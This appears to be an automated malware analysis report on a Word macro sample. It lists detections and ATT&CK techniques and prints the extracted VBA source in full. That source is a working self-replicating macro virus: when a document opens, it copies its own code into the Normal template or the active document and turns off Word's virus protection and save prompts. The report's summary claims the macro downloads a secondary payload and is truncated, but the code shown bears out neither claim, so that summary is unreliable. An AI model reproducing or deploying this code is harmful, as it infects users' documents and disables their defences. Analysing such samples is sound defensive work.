Verdict: MALICIOUS (Risk Score 120)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be designed to download and execute a secondary payload, as indicated by the ClamAV detection name 'Doc.Trojan.Confusion-2' and the presence of VBA code that manipulates the document and potentially interacts with external resources. The macro's code is heavily obfuscated and truncated, making a precise analysis of its actions difficult, but its intent is clearly malicious.
Heuristics (3)
- ClamAV: Doc.Trojan.Confusion-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Confusion-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2386 bytes |

SHA-256: 90d4e78c0b6ac5f2f937edec1672a34a772c87fd4202a5ccbb01ec6b740ef826
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    ' Junk assignments (System.Country, DisplayAlerts, Caption, ...) are
    ' interleaved throughout as obfuscation and have no effect on the logic.
    A1 = System.Country
    Set A = ThisDocument
    gh = Application.DisplayAlerts
    With A
        Set dfg = Word.System
        Set B = .VBProject
        If Application.Documents.Count = 0 Then gfs = Application.Caption
    End With
    Author = "Lys Kovick"
    With B
        Application.Visible = True
        Set C = .VBComponents
        If C1 = Application.Version Then Beep
    End With
    kgb = afterme
    With C
        CPU = System.ProcessorType
        Set D = .Item(1)
        R = U = Confused
    End With
    ICU = DoUCMe
    With D
        BSBSBS = Application.Caption
        Set E = .CodeModule
        OS = System.OperatingSystem
    End With
    TD = ThisDocument
    With E
        A1 = System.Country
        ' Read this document's own macro source into F
        F = .Lines(1, .CountOfLines)
        gh = Application.DisplayAlerts
    End With
    Set dfg = Word.System
    ' Choose the copy target: the Normal template when running from the
    ' infected document, otherwise the currently active document
    If A = ActiveDocument Then
        If Application.Documents.Count = 0 Then gfs = Application.Caption
        Set G = NormalTemplate
        Author = "Lys Kovick"
    Else
        Application.Visible = True
        Set G = ActiveDocument
        If C1 = Application.Version Then Beep
    End If
    kgb = afterme
    With G
        CPU = System.ProcessorType
        Set H = .VBProject
        R = U = Confused
    End With
    ICU = DoUCMe
    With H
        BSBSBS = Application.Caption
        Set I = .VBComponents
        OS = System.OperatingSystem
    End With
    TD = ThisDocument
    With I
        A1 = System.Country
        Set J = .Item(1)
        gh = Application.DisplayAlerts
    End With
    Set dfg = Word.System
    With J
        If Application.Documents.Count = 0 Then gfs = Application.Caption
        Set K = .CodeModule
        Author = "Lys Kovick"
    End With
    Application.Visible = True
    With K
        If C1 = Application.Version Then Beep
        ' Replace the target module's code with this macro's source
        .DeleteLines 1, .CountOfLines
        kgb = afterme
    End With
    CPU = System.ProcessorType
    With K
        R = U = Confused
        .AddFromString F
        ICU = DoUCMe
    End With
    BSBSBS = Application.Caption
    Set L = Options
    OS = System.OperatingSystem
    ' Disable the Word prompts that would reveal the template change
    With L
        TD = ThisDocument
        .ConfirmConversions = 0
        A1 = System.Country
    End With
    gh = Application.DisplayAlerts
    With L
        Set dfg = Word.System
        .SaveNormalPrompt = 0
        If Application.Documents.Count = 0 Then gfs = Application.Caption
    End With
    Author = "Lys Kovick"
    With L
        Application.Visible = True
        .VirusProtection = 0
        If C1 = Application.Version Then Beep
    End With
    kgb = afterme
End Sub
```